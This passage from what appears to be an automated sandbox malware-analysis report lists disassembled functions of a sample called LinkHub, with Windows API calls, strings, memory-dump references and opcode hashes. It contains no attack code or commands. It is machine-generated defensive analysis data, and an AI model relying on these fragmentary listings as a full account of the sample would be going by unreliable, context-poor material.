                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 002A6798
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 002A67AB
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002A67C1
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002A67CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: c9c5b1ff0a545b79b379ce49842689005063c5fd2d3f74f47ddbc0d737ec7f07
                                                                    • Instruction ID: 36b3bbd8aa34d71916a61cf27322be8524a832679cda17acb3bc8e4d6ae25eca
                                                                    • Opcode Fuzzy Hash: c9c5b1ff0a545b79b379ce49842689005063c5fd2d3f74f47ddbc0d737ec7f07
                                                                    • Instruction Fuzzy Hash: 32514FB0F10605AFDF08CF68DD89AAEBBB9FB48314F148129F519E7290DB709D108B90
                                                                    APIs
                                                                      • Part of subcall function 00242234: GetWindowLongW.USER32(?,000000EB), ref: 00242242
                                                                    • GetSysColor.USER32(0000000F), ref: 00242152
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: b03f6ab7aee6be9c92d2e9c8983213e62e9ef42cdcbfc65f415d30835d5bf610
                                                                    • Instruction ID: bc9f9e8c3565d5ef139fe9aa49a90d93ca77bca07b192282d1108f7202563cd6
                                                                    • Opcode Fuzzy Hash: b03f6ab7aee6be9c92d2e9c8983213e62e9ef42cdcbfc65f415d30835d5bf610
                                                                    • Instruction Fuzzy Hash: 2E411531111641EFDB249F39AC48BB93B69EB06730F944245FAAA872E2C370DD66DB10
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002828D1
                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002828EA
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002828FA
                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00282912
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00282933
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002411F5,00000000,00000000,00000000,000000FF,00000000), ref: 00282942
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0028295F
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002411F5,00000000,00000000,00000000,000000FF,00000000), ref: 0028296E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                    • String ID: (1
                                                                    • API String ID: 1268354404-3903994380
                                                                    • Opcode ID: c564aa75310b9cc6c1b6f5ba7c72a74d9cdf74c2942b922114c4c55de766f1f8
                                                                    • Instruction ID: e79231471a0a348d8581998654c61896c1b356573f3412016fb446efa1132748
                                                                    • Opcode Fuzzy Hash: c564aa75310b9cc6c1b6f5ba7c72a74d9cdf74c2942b922114c4c55de766f1f8
                                                                    • Instruction Fuzzy Hash: AB517834A2160AEFDB28DF25DC45BAA7BB5EB48310F104519F942A62E0D7B0EDB0DB50
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                      • Part of subcall function 002419CD: GetCursorPos.USER32(?), ref: 002419E1
                                                                      • Part of subcall function 002419CD: ScreenToClient.USER32(00000000,?), ref: 002419FE
                                                                      • Part of subcall function 002419CD: GetAsyncKeyState.USER32(00000001), ref: 00241A23
                                                                      • Part of subcall function 002419CD: GetAsyncKeyState.USER32(00000002), ref: 00241A3D
                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 002D95C7
                                                                    • ImageList_EndDrag.COMCTL32 ref: 002D95CD
                                                                    • ReleaseCapture.USER32 ref: 002D95D3
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 002D966E
                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002D9681
                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 002D975B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$(1$(1
                                                                    • API String ID: 1924731296-2393032099
                                                                    • Opcode ID: 09ac6439f30f78c68aeab97ebff13eb08279651290bcc7ee8bd2fd79382ca956
                                                                    • Instruction ID: 160f7224a114db8b3676735128ab31a7aac6092a2182a760493429d2616b416a
                                                                    • Opcode Fuzzy Hash: 09ac6439f30f78c68aeab97ebff13eb08279651290bcc7ee8bd2fd79382ca956
                                                                    • Instruction Fuzzy Hash: C9518D74614300AFD709EF24DC5AFAA77E8FB88714F40062AF595962E1CB709D64CF52
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00290D31,00000001,0000138C,00000001,00000001,00000001,?,002BEEAE,00312430), ref: 002AA091
                                                                    • LoadStringW.USER32(00000000,?,00290D31,00000001), ref: 002AA09A
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00290D31,00000001,0000138C,00000001,00000001,00000001,?,002BEEAE,00312430,?), ref: 002AA0BC
                                                                    • LoadStringW.USER32(00000000,?,00290D31,00000001), ref: 002AA0BF
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002AA1E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 747408836-2268648507
                                                                    • Opcode ID: af5530f3026269ea8454fbdc130bb0fc2c1d43d4a4eb5487c1edde231bcd1a7f
                                                                    • Instruction ID: 8535281a2c5bff23464f94da6aeae8b1fad7dd4cd7a5166ae70766da0a561864
                                                                    • Opcode Fuzzy Hash: af5530f3026269ea8454fbdc130bb0fc2c1d43d4a4eb5487c1edde231bcd1a7f
                                                                    • Instruction Fuzzy Hash: D1413D72C10109ABCB0AEBE0DD46DEEB778AF19304F500065F505B2092DB75AF69CFA1
                                                                    APIs
                                                                      • Part of subcall function 00248577: _wcslen.LIBCMT ref: 0024858A
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002A1093
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002A10AF
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002A10CB
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002A10F5
                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 002A111D
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A1128
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A112D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 323675364-22481851
                                                                    • Opcode ID: 81bf0a85b10aaa7d8d4104f6dcde69e4fbde451327bf27d4e642332ea193fc05
                                                                    • Instruction ID: 7afcb45c943150e9a22a7ffaf3191081e1f70a61954fde6fc1ef70d801ce7ca6
                                                                    • Opcode Fuzzy Hash: 81bf0a85b10aaa7d8d4104f6dcde69e4fbde451327bf27d4e642332ea193fc05
                                                                    • Instruction Fuzzy Hash: 9D410872C20629ABCF16EFA4DC95DEEB778FF08750F404069E905A21A0EB319E24CF50
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002D4AD9
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 002D4AE0
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002D4AF3
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002D4AFB
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 002D4B06
                                                                    • DeleteDC.GDI32(00000000), ref: 002D4B10
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002D4B1A
                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 002D4B30
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 002D4B3C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: 1ff1df9e9b6a5f8b62f4cbfb42d9a911c734fd8552b983311dc0660e857b1f76
                                                                    • Instruction ID: cddb0fca292d0156484d795de098313783070a35f433502c5451b2450a044769
                                                                    • Opcode Fuzzy Hash: 1ff1df9e9b6a5f8b62f4cbfb42d9a911c734fd8552b983311dc0660e857b1f76
                                                                    • Instruction Fuzzy Hash: 56318F31551616BBDF11AFA4EC08FDA3BA9FF0D328F110212FA58A62A0C735DC20DB94
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 002C46B9
                                                                    • CoInitialize.OLE32(00000000), ref: 002C46E7
                                                                    • CoUninitialize.OLE32 ref: 002C46F1
                                                                    • _wcslen.LIBCMT ref: 002C478A
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 002C480E
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 002C4932
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 002C496B
                                                                    • CoGetObject.OLE32(?,00000000,002E0B64,?), ref: 002C498A
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 002C499D
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002C4A21
                                                                    • VariantClear.OLEAUT32(?), ref: 002C4A35
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                    • String ID:
                                                                    • API String ID: 429561992-0
                                                                    • Opcode ID: b41fcdeccf6631da5d216a5a9dbf78a7be8b9f2464f561dad90b9e271517025b
                                                                    • Instruction ID: 19d2cd97a247b75ea102cc3502e1bdcb5a4b2ac867b6fca2428b21ebd8f42f01
                                                                    • Opcode Fuzzy Hash: b41fcdeccf6631da5d216a5a9dbf78a7be8b9f2464f561dad90b9e271517025b
                                                                    • Instruction Fuzzy Hash: 64C12471628301AF9700EF68C894E2BB7E9FF89748F104A1DF9899B210DB71ED55CB52
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 002B8538
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002B85D4
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 002B85E8
                                                                    • CoCreateInstance.OLE32(002E0CD4,00000000,00000001,00307E8C,?), ref: 002B8634
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002B86B9
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 002B8711
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 002B879C
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002B87BF
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 002B87C6
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 002B881B
                                                                    • CoUninitialize.OLE32 ref: 002B8821
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2762341140-0
                                                                    • Opcode ID: 4a69ae6dfc7f656ce353ba6cb4b01a3a8978ec2e22ee80dc8e498cd43778f47e
                                                                    • Instruction ID: 2cc734d600f18dc15b9069ddb9de0a9808dba243008e0bfeb3ab3b61a95f01ab
                                                                    • Opcode Fuzzy Hash: 4a69ae6dfc7f656ce353ba6cb4b01a3a8978ec2e22ee80dc8e498cd43778f47e
                                                                    • Instruction Fuzzy Hash: 1DC11975A10509AFCB14DFA4C888DAEBBF9FF48344B148499E41ADB261DB30ED56CF90
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002A039F
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 002A03F8
                                                                    • VariantInit.OLEAUT32(?), ref: 002A040A
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 002A042A
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 002A047D
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 002A0491
                                                                    • VariantClear.OLEAUT32(?), ref: 002A04A6
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 002A04B3
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A04BC
                                                                    • VariantClear.OLEAUT32(?), ref: 002A04CE
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A04D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 61331f37afcbb36091c86cc38e0db31d16c91dd982e574d26c0f101edd3f4aac
                                                                    • Instruction ID: aea74e0c8b682d2926c6a49cd838ff44456a96665779afcd6a974a272abd1b80
                                                                    • Opcode Fuzzy Hash: 61331f37afcbb36091c86cc38e0db31d16c91dd982e574d26c0f101edd3f4aac
                                                                    • Instruction Fuzzy Hash: D0417F35E10219EFDF00DFA4D8889AE7BB9FF49344F008069E905A7261CB70AD55CFA0
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 002AA65D
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 002AA6DE
                                                                    • GetKeyState.USER32(000000A0), ref: 002AA6F9
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 002AA713
                                                                    • GetKeyState.USER32(000000A1), ref: 002AA728
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 002AA740
                                                                    • GetKeyState.USER32(00000011), ref: 002AA752
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 002AA76A
                                                                    • GetKeyState.USER32(00000012), ref: 002AA77C
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 002AA794
                                                                    • GetKeyState.USER32(0000005B), ref: 002AA7A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 894e01f4bec23f7e09942e3b21bb19ef7013e8107efe6e99ab768ba2b18bd216
                                                                    • Instruction ID: fe315bde652525bb79dac212be64802bd7f119157a3b17be6e7506f3126aad71
                                                                    • Opcode Fuzzy Hash: 894e01f4bec23f7e09942e3b21bb19ef7013e8107efe6e99ab768ba2b18bd216
                                                                    • Instruction Fuzzy Hash: 7041C5645557C76BFF318E6098043AAFEB4AF13704F48805AD6C64A1C2DF949DE4CBA3
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 002C1019
                                                                    • inet_addr.WSOCK32(?), ref: 002C1079
                                                                    • gethostbyname.WSOCK32(?), ref: 002C1085
                                                                    • IcmpCreateFile.IPHLPAPI ref: 002C1093
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002C1123
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002C1142
                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 002C1216
                                                                    • WSACleanup.WSOCK32 ref: 002C121C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: 7a88de3485e883d7146299c9d24d1eeab6cfdd46453c8091bc4131216569e20e
                                                                    • Instruction ID: eb30e81c3fcad862d248c284919f60c9c3b8a5bf6eef8c4f4aac217a2a8710f9
                                                                    • Opcode Fuzzy Hash: 7a88de3485e883d7146299c9d24d1eeab6cfdd46453c8091bc4131216569e20e
                                                                    • Instruction Fuzzy Hash: BC91D0316142029FD720DF15C88AF16BBE0EF45318F18869DF9698B6A2C774EC61CF81
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharLower
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 707087890-567219261
                                                                    • Opcode ID: 87aac5976c02a945e7ae8113e01fdc1ec1566c5cc29b9d9262986049f4294491
                                                                    • Instruction ID: 04712c0a8f5a82c0d8631d0077d3ea4d8dc56190c95e3560ca0d9142b6098848
                                                                    • Opcode Fuzzy Hash: 87aac5976c02a945e7ae8113e01fdc1ec1566c5cc29b9d9262986049f4294491
                                                                    • Instruction Fuzzy Hash: 3851C131A205179BCB14DF68C954ABEB3A5BF15360B20432DE866E7684DB31DDA0CB90
                                                                    APIs
                                                                    • CoInitialize.OLE32 ref: 002C41D1
                                                                    • CoUninitialize.OLE32 ref: 002C41DC
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,002E0B44,?), ref: 002C4236
                                                                    • IIDFromString.OLE32(?,?), ref: 002C42A9
                                                                    • VariantInit.OLEAUT32(?), ref: 002C4341
                                                                    • VariantClear.OLEAUT32(?), ref: 002C4393
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
